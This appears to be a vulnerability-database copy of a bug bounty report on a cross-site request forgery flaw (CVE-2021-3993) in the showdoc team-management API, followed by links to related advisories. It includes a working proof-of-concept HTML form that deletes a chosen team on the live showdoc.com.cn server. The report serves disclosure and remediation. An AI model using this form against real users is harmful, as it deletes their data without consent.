Lucene search
Amammad0AA84736-139B-4AE7-BECF-604F7F60B1C9HistoryNov 21, 2021 - 1:18 p.m.
Cross-Site Request Forgery (CSRF) in star7th/showdoc
2021-11-2113:18:23
amammad
www.huntr.dev
10
0.001 Low
EPSS
Percentile
30.5%
Description
You set the strict flag only for one of your cookies named cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID don’t have strict flag.
Proof of Concept
1.replace 38046 with the team id
2.open poc.html and click on submit button.
3.after that the team with id 38046 or your replaced team id will be deleted.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
<input type="hidden" name="id" value="38046" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
nvd
nvd
CVE-2021-3993
2021-12-01 11:15:08
github
github
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
2021-12-03 20:42:35
cve
cve
CVE-2021-3993
2021-12-01 11:15:08
veracode
veracode
Cross-Site Request Forgery (CSRF)
2021-12-03 05:54:17
osv
osv
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
2021-12-03 20:42:35
CVE-2021-3993
2021-12-01 11:15:08
cnvd
cnvd
showdoc Cross-site Request Forgery Vulnerability (CNVD-2021-94820)
2021-12-02 00:00:00
cvelist
cvelist
CVE-2021-3993 Cross-Site Request Forgery (CSRF) in star7th/showdoc
2021-12-01 10:40:09
prion
prion
Cross site request forgery (csrf)
2021-12-01 11:15:00